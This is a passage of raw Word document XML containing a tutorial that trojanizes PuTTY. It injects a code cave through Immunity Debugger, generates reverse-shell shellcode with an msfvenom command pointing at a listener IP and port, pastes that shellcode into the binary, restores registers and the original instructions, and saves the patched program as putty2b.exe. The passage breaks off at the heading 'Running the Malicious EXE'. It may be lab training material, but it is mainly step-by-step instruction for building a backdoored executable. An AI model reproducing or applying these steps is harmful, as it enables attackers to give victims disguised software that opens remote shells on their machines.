          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Repeat the same steps to get back to the location of the ExitProcess function call. Then toggle another breakpoint at the jump instruction we just added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FC3428" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6998B4" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Follow the jump instruction to the location of our code cave.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441417BE" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51DFB282" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Go to Kali Linux and generate reverse shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD000F1" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
        </w:rPr>
        <w:t xml:space="preserve"> msfvenom -p windows/shell_reverse_tcp LHOST=192.168.210.129 LPORT=4444 -f hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC0DD9C" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2502B57D" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> do not forget to change the IP Address of your Kali Linux, this was the IP Address of my setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F95426" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1E2A8B" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now before we inject the code, you need to understand that we need to do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0352F057" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Save all registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDAE4EB" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Save the arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8CBE67" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Execute our shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51713448" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Align back the Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF9734" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Restore the registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4888990E" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Restore the arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B648EF8" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BCD949E" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Let’s see how to do that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CB20AE" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B17E4A" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Go to the location of the cave code and start the process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B46B6E0" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>First add “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PUSHAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E2689F" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D46CE9" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Add the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PUSHFD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A62F59F" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0175997A" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="178D8017" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A77B0A0" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CBFA6EE" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F73CE83" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C67C36" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019810F1" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now highlight a lot of lines in the cave code section, then right click and then go to “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” → “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Binary paste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CEA18D" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F187A50" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You should notice that the color of the code injected is now yellow and byte codes are in cyan as seen in the screenshot below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59191711" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1ED7267B" wp14:editId="3EEBFC99">
            <wp:extent cx="4238625" cy="4724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238625" cy="4724400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3296D65F" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FAAC344" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Not finished yet, move on please :)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3511EFDB" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2B6A78" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Now let us add the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POPAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” and “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POPFD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” instruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A04320" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373C120B" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I would also recommend adding some no operations (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) before adding the missing code. I added 5 NOPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D0DBC" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C54A1B1" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now add the original code we replaced (my case):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CBC637" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PUSH DWORD PTR SS:[EBP+8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457FE753" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CALL 01409E1C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA2F98" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B60CF43" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Now the jump back to home, or where it was supposed to go. This is the address of the next instruction after our jump to code cave. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFBE62E" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In my case this was: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>00879EB9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BA25F7" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654F317F" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7E465118" wp14:editId="6AA20BEA">
            <wp:extent cx="4933950" cy="6381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933950" cy="638175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2ABAE4" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445089EE" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The code now will look similar to the screenshot below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C845C7" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E29C6B8" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Highlight all the changes and let us save the code to a new EXE. I’m going to save it as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>putty2b.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B98279" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ECF18BA" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Close the current copy and open the newly modified copy in Immunity Debugger and do the same thing by locating the function and adding a breakpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F456F7" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB8E877" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Let us trace it now :D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BB19E9" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="004C25E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59DDE313" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="305D2B2B" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_6usj5fysc69s" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Running the Malicious EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014DCD3E" w14:textId="77777777" w:rsidR="004C25E3" w:rsidRDefault="00000000">
